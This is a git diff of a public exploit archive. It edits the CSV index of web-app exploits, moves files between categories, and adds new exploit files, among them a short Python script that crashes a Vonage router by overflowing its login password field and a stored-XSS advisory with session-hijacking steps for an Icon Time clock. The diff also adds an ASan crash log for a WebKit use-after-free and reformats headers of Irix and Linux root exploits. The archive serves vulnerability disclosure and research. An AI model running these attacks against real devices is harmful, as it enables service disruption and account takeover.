Injection",2009-12-19,cr4wl3r,php,webapps,0 
@@ -25208,7 +25218,7 @@ id,file,description,date,author,platform,type,port 16004,platforms/php/webapps/16004.txt,"PHP-Fusion Teams Structure Infusion Addon - SQL Injection",2011-01-17,Saif,php,webapps,0 16006,platforms/cgi/webapps/16006.html,"SmoothWall Express 3.0 - Multiple Vulnerabilities",2011-01-17,"dave b",cgi,webapps,0 16010,platforms/php/webapps/16010.txt,"Joomla! Component allCineVid 1.0.0 - Blind SQL Injection",2011-01-18,"Salvatore Fresta",php,webapps,0 -16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()'",2011-01-18,felix,php,webapps,0 +16011,platforms/php/webapps/16011.txt,"CakePHP 1.3.5/1.2.8 - 'Unserialize()' File Inclusion",2011-01-18,felix,php,webapps,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Cross-Site Request Forgery (Admin Add)",2011-01-18,anT!-Tr0J4n,php,webapps,0 17209,platforms/php/webapps/17209.txt,"SoftMP3 - SQL Injection",2011-04-24,mArTi,php,webapps,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 
@@ -25319,7 +25329,7 @@ id,file,description,date,author,platform,type,port 16267,platforms/php/webapps/16267.txt,"Bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection",2011-03-02,DSecurity,php,webapps,0 16273,platforms/php/webapps/16273.php,"WordPress Plugin PHP Speedy 0.5.2 - 'admin_container.php' Remote Code Execution",2011-03-04,mr_me,php,webapps,0 -16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote",2011-03-04,kingcope,jsp,webapps,0 +16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution",2011-03-04,kingcope,jsp,webapps,0 16276,platforms/php/webapps/16276.txt,"ADAN Neuronlabs - 'view.php' SQL Injection",2011-03-04,IRAQ_JAGUAR,php,webapps,0 16279,platforms/php/webapps/16279.txt,"MySms 1.0 - Multiple Vulnerabilities",2011-03-05,AtT4CKxT3rR0r1ST,php,webapps,0 16280,platforms/php/webapps/16280.py,"vTiger CRM 5.0.4 - Unauthenticated Local File Inclusion",2011-03-05,TecR0c,php,webapps,0 
@@ -31354,7 +31364,7 @@ id,file,description,date,author,platform,type,port 30031,platforms/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps,0 30085,platforms/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps,0 30035,platforms/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps,0 -30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 -",2007-05-14,"David Kierznowski",php,webapps,0 +30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",php,webapps,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps,0 
@@ -31818,6 +31828,7 @@ id,file,description,date,author,platform,type,port 30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - 'Oku.asp' SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 +30286,platforms/linux/webapps/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",linux,webapps,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps,0 30290,platforms/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",php,webapps,0 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 
@@ -34057,6 +34068,7 @@ id,file,description,date,author,platform,type,port 34071,platforms/php/webapps/34071.txt,"Joomla! Component com_sar_news - 'id' SQL Injection",2010-06-02,LynX,php,webapps,0 34072,platforms/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 34073,platforms/php/webapps/34073.py,"TCExam 10.1.7 - '/admin/code/tce_functions_tcecode_editor.php' Arbitrary File Upload",2010-06-02,"John Leitch",php,webapps,0 +34136,platforms/multiple/webapps/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 34087,platforms/php/webapps/34087.txt,"Joomla! Component Youtube Gallery 4.1.7 - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 @@ -38852,3 +38864,4 @@ id,file,description,date,author,platform,type,port 43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0 43140,platforms/php/webapps/43140.txt,"Kirby CMS < 2.5.7 - Cross-Site Scripting",2017-11-13,"Ishaq Mohammed",php,webapps,0 43155,platforms/php/webapps/43155.txt,"Zeta Components Mail 1.8.1 - Remote Code Execution",2017-11-16,MalwareBenchmark,php,webapps,0 +43158,platforms/hardware/webapps/43158.txt,"Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting",2017-11-17,"Keith Thome",hardware,webapps,0 diff --git a/platforms/aix/dos/19045.txt b/platforms/aix/local/19045.txt similarity index 100% rename from platforms/aix/dos/19045.txt rename to platforms/aix/local/19045.txt 
diff --git a/platforms/hardware/dos/43164.py b/platforms/hardware/dos/43164.py new file mode 100755 index 000000000..a55f09491 --- /dev/null +++ b/platforms/hardware/dos/43164.py @@ -0,0 +1,23 @@ +Overview +During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is controllable and allow for full remote code execution. + +Device Description: +1 port residential gateway + +Hardware Version: +VDV-23: 115 + +Original Software Version: +3.2.11-0.9.40 + +Exploitation Writeup +This exploit was a simple buffer overflow. The use of spike fuzzer took place to identify the crash condition. When the application crashes, the router reboots causing a denial of service condition. The script below was further weaponized to sleep for a 60 second period while the device rebooted then continue one execution after another. + +Proof of concept code: +The code below was used to exploit the application. This testing was only performed against denial of service conditions. The crash that was experienced potentially holds the ability to allow remote code execution. Further research will be performed against the device. + +DOSTest.py + +import requests
 +passw = 'A' * 10580
post_data = {'loginUsername':'router', 'loginPassword':passw, 'x':'0', 'y':'0'}
 +post_response = requests.post(url='http://192.168.15.1/goform/login', data=post_data) \ No newline at end of file diff --git a/platforms/hardware/webapps/43158.txt b/platforms/hardware/webapps/43158.txt new file mode 100644 index 000000000..7ed1825fc --- /dev/null +++ b/platforms/hardware/webapps/43158.txt 
@@ -0,0 +1,46 @@ +# Exploit Title: Icon Time Systems RTC-1000 (<= v2.5.7458) Universal Time Clocks Stored XSS Vulnerability +# Date: 17-11-2017 +# Vendor: http://www.icontime.com/ +# Version: <= v2.5.7458 +# Exploit Author: Keith Thome +# Contact: https://twitter.com/keiththome +# Website: https://www.keiththome.com/rtc-1000-vuln +# CVE: CVE-2017-16819 +# Type: Remote +# Platform: Hardware + +========================================================== + +# Introduction +The Icon Time Systems RTC-1000 (firmware v2.5.7458 and below) Universal Time Clock device is susceptible to a stored Cross Site Scripting (XSS) vulnerability that facilitates session hijacking. Injecting a session hijacking XSS payload into the ‘First Name’ field of an employee record on the employee.html webpage results in payload execution wherever this employee's first name appears in subsequent webpages. Caveat: To exploit this vulnerability, the attacker does need valid credentials to access the device and those credentials must have permissions to change employee names. + +========================================================== + +# Vulnerable URL (Employee Maintenance Module) +/employee.html + +# Vulnerable parameter(s) +- First Name input ID: nameFirst + +# Sample payload + + +========================================================== + +# PROOF OF CONCEPT +- With valid credentials that has permissions to modify the employee records, access the employeelist.html page via Lists->Employees +- Click on an active employee or Show Inactive to modify an employee record. +- Click on the employee id or name to access the vulnerable employee.html page. +- In the First Name field, enter a XSS payload. +- Click Submit +- Once any user accesses a page where that employee's first name is displayed, the XSS will be executed. Ie. employeelist.html that lists all employees. + +========================================================== + +# Timeline +- 09/08/2017 - Vulnerability discovered. 
+- 09/15/2017 - Vendor informed. +- 09/19/2017 - Vendor informed. +- 09/19/2017 - Vendor acknowleged and indicated patch development underway. +- 10/24/2017 - Emailed vendor for update. No response. +- 11/17/2017 - Public Disclosure \ No newline at end of file diff --git a/platforms/irix/local/19273.sh b/platforms/irix/local/19273.sh index 1463ca457..06c6cc98c 100755 --- a/platforms/irix/local/19273.sh +++ b/platforms/irix/local/19273.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/345/info - -A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. - -day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain. +#!/bin/sh +#source: http://www.securityfocus.com/bid/345/info +# +#A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. +# +#day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain. #!/bin/sh # reg4root - Register me for Root! diff --git a/platforms/irix/local/19310.c b/platforms/irix/local/19310.c index f48d7d2b1..a0e4419ef 100644 --- a/platforms/irix/local/19310.c +++ b/platforms/irix/local/19310.c 
@@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/392/info -A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefullly crafted, log buffer to the -h option of login, a local user can obtain root privileges. +A buffer overflow exists in the /bin/login program supplied by Silicon Graphics, as part of their Irix operating system. By supplying a carefully crafted, log buffer to the -h option of login, a local user can obtain root privileges. +*/ /* /bin/login exploit by DCRH 24/5/97 * diff --git a/platforms/irix/local/19706.sh b/platforms/irix/local/19706.sh index ed41bd3e3..ed58f0c72 100755 --- a/platforms/irix/local/19706.sh +++ b/platforms/irix/local/19706.sh 
@@ -1,6 +1,8 @@ -source: http://www.securityfocus.com/bid/909/info - -SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root priviliges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. +#!/bin/sh +#source: http://www.securityfocus.com/bid/909/info +# +#SGI's Irix operating system ships with an X11 application called 'soundplayer' which is used to play .WAV files. It is not setuid root by itself, but can inherit root privileges if called by midikeys (which is setuid on some old IRIX systems). Soundplayer is vulnerable to an input validation problem. When saving a file to disk with soundplayer, if a semicolon is appended to the end of the "proper" or "real" filename input followed by a command to be executed (no spaces), the command will run with the privileges soundplayer has (elevated or not). It is possible to compromise root access locally through exploitation of this vulnerability if soundplayer is executed (then exploited..) through setuid midikeys. +# #!/bin/sh # diff --git a/platforms/linux/remote/38.pl b/platforms/linux/dos/38.pl similarity index 100% rename from platforms/linux/remote/38.pl rename to platforms/linux/dos/38.pl diff --git a/platforms/linux/local/19254.c b/platforms/linux/local/19254.c index 17036693a..2f01b9ee8 100644 --- a/platforms/linux/local/19254.c +++ b/platforms/linux/local/19254.c 
@@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/319/info Linux gnuplot 3.5 is shipped with S.u.S.E. Linux 5.2 and installed suid root by default. There is a buffer overflow vulnerability present in gnuplot which allows for users to obtain root access locally. +*/ /* diff --git a/platforms/linux/local/19565.sh b/platforms/linux/local/19565.sh index 7c2a97ee1..135088dec 100755 --- a/platforms/linux/local/19565.sh +++ b/platforms/linux/local/19565.sh @@ -1,8 +1,9 @@ -source: http://www.securityfocus.com/bid/738/info - -cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. - ---- cdda2x.sh --- +#! /bin/sh +#source: http://www.securityfocus.com/bid/738/info +# +#cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. +# +#--- cdda2x.sh --- #! /bin/sh # # Shell script for Linux x86 cdda2cdr exploit diff --git a/platforms/linux/local/19900.c b/platforms/linux/local/19900.c index a0d9d5058..11872503b 100644 --- a/platforms/linux/local/19900.c +++ b/platforms/linux/local/19900.c 
@@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1176/info A vulnerability exists in the pam_console PAM module, included as part of any Linux system running PAM. pam_console exists to own certain devices to users logging in to the console of a Linux machine. It is designed to allow only console users to utilize things such as sound devices. It will chown devices to users upon logging in, and chown them back to being owned by root upon logout. However, as certain devices do not have a 'hangup' mechanism, like a tty device, it is possible for a local user to continue to monitor activity on certain devices after logging out. This could allow an malicious user to sniff other users console sessions, and potentially obtain the root password if the root user logs in, or a user su's to root. They could also surreptitiously execute commands as the user on the console. +*/ #include diff --git a/platforms/linux/local/23154.c b/platforms/linux/local/23154.c index c28a2ac41..87fc9aa71 100644 --- a/platforms/linux/local/23154.c +++ b/platforms/linux/local/23154.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/8641/info Sendmail is prone to a buffer overrun vulnerability in the prescan() function. This issue is different than the vulnerability described in BID 7230. This vulnerability could permit remote attackers to execute arbitrary code via vulnerable versions of Sendmail. +*/ /* Local exploit for the old sendmail vuln found by lcamtuf in 8.12.9 and below. * by Gyan Chawdhary, gunnu45@hotmail.com diff --git a/platforms/linux/remote/405.c b/platforms/linux/local/405.c similarity index 100% rename from platforms/linux/remote/405.c rename to platforms/linux/local/405.c diff --git a/platforms/linux/local/23740.c b/platforms/linux/remote/23740.c similarity index 96% rename from platforms/linux/local/23740.c rename to platforms/linux/remote/23740.c index 996252e8e..828cd510e 100644 --- a/platforms/linux/local/23740.c +++ b/platforms/linux/remote/23740.c 
@@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/9715/info hsftp has been found to be prone to a remote print format string vulnerability. This issue is due to the application improper use of a format printing function. Ultimately this vulnerability could allow for execution of arbitrary code on the system implementing the affected software, which would occur in the security context of the server process. +*/ // priestmasters hsftp <=1.11 remote format string exploit // mail: priest@priestmaster.org diff --git a/platforms/linux/remote/30286.txt b/platforms/linux/webapps/30286.txt similarity index 100% rename from platforms/linux/remote/30286.txt rename to platforms/linux/webapps/30286.txt diff --git a/platforms/linux/remote/6026.pl b/platforms/linux/webapps/6026.pl similarity index 100% rename from platforms/linux/remote/6026.pl rename to platforms/linux/webapps/6026.pl diff --git a/platforms/multiple/dos/43166.js b/platforms/multiple/dos/43166.js new file mode 100644 index 000000000..5297011da --- /dev/null +++ b/platforms/multiple/dos/43166.js 
@@ -0,0 +1,213 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1344 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +PoC: + +================================================================= +*/ + + + + + +foo + + + + +/* +================================================================= + +ASan log: + +================================================================= +==29647==ERROR: AddressSanitizer: heap-use-after-free on address 0x61e00005d0d8 at pc 0x00010a64aa4b bp 0x7fff5b813380 sp 0x7fff5b813378 +READ of size 8 at 0x61e00005d0d8 thread T0 +==29647==WARNING: invalid path to external symbolizer! +==29647==WARNING: Failed to use and restart external symbolizer! + #0 0x10a64aa4a in WebCore::TreeScope::documentScope() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5a4a) + #1 0x10aa1044f in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3cb44f) + #2 0x10b4602bd in WebCore::HTMLScriptElement::~HTMLScriptElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe1b2bd) + #3 0x1188b9845 in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1410845) + #4 0x1188b98fa in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, 
JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14108fa) + #5 0x1188b5fcd in void JSC::MarkedBlock::Handle::specializedSweep(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140cfcd) + #6 0x1188afced in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1406ced) + #7 0x1188af34e in void JSC::MarkedBlock::Handle::finishSweepKnowingSubspace(JSC::FreeList*, JSC::(anonymous namespace)::DestroyFunc const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x140634e) + #8 0x1188aefa2 in JSC::JSDestructibleObjectSubspace::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1405fa2) + #9 0x118b641ab in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16bb1ab) + #10 0x118b5f2e2 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b62e2) + #11 0x118b5ec1a in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b5c1a) + #12 0x118b5fce6 in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16b6ce6) + #13 0x118f305f2 in JSC::Subspace::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1a875f2) + #14 0x10b9f5219 in void* JSC::allocateCell(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13b0219) + #15 0x10b9f4e89 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afe89) + #16 0x10b9f4dcb in std::__1::enable_if::value, WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afdcb) + #17 0x10b9f4b99 in std::__1::enable_if::value), WebCore::JSDOMWrapperConverterTraits::WrapperClass*>::type WebCore::createWrapper(WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13afb99) + #18 0x10b9f482d in WebCore::createNewDocumentWrapper(JSC::ExecState&, WebCore::JSDOMGlobalObject&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af82d) + #19 0x10b9f49f8 in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, 
WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x13af9f8) + #20 0x10c0407ce in WebCore::createWrapper(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x19fb7ce) + #21 0x10b41b57b in WebCore::toJS(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xdd657b) + #22 0x10bc3fe80 in WebCore::JSDOMWindowBase::updateDocument() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x15fae80) + #23 0x10d061fa3 in WebCore::ScriptController::initScript(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a1cfa3) + #24 0x10479c7a6 in WebCore::ScriptController::windowProxy(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3957a6) + #25 0x104799e28 in WebCore::ScriptController::globalObject(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x392e28) + #26 0x104b78fc4 in WebKit::WebFrame::jsContextForWorld(WebKit::InjectedBundleScriptWorld*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x771fc4) + #27 0x7fffe652f9e1 in Safari::WebFeedFinderController::WebFeedFinderController(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x55e9e1) + #28 0x7fffe6089a67 in Safari::BrowserBundlePageController::determineWebFeedInformation(Safari::WK::BundleFrame const&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xb8a67) + #29 0x7fffe60970b1 in 
Safari::BrowserBundlePageLoaderClient::didFinishLoadForFrame(Safari::WK::BundlePage const&, Safari::WK::BundleFrame const&, Safari::WK::Type&) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0xc60b1) + #30 0x7fffe617121c in Safari::WK::didFinishLoadForFrame(OpaqueWKBundlePage const*, OpaqueWKBundleFrame const*, void const**, void const*) (/System/Library/PrivateFrameworks/Safari.framework/Versions/A/Safari:x86_64+0x1a021c) + #31 0x10458b175 in WebKit::InjectedBundlePageLoaderClient::didFinishLoadForFrame(WebKit::WebPage&, WebKit::WebFrame&, WTF::RefPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x184175) + #32 0x104b836a5 in WebKit::WebFrameLoaderClient::dispatchDidFinishLoad() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x77c6a5) + #33 0x10b19ac45 in WebCore::FrameLoader::checkLoadCompleteForThisFrame() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb55c45) + #34 0x10b18ece7 in WebCore::FrameLoader::checkLoadComplete() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb49ce7) + #35 0x10ae5d781 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818781) + #36 0x10a8d9047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #37 0x10a8d1df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #38 0x10d3a9661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #39 0x104f1a43b in 
WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #40 0x104f1d6d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #41 0x104f1cbc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #42 0x10470e117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #43 0x1044ed695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #44 0x1044f6a48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #45 0x1191cb842 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d22842) + #46 0x1191cc1b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #47 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #48 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #49 0x7fffd528f715 in __CFRunLoopRun 
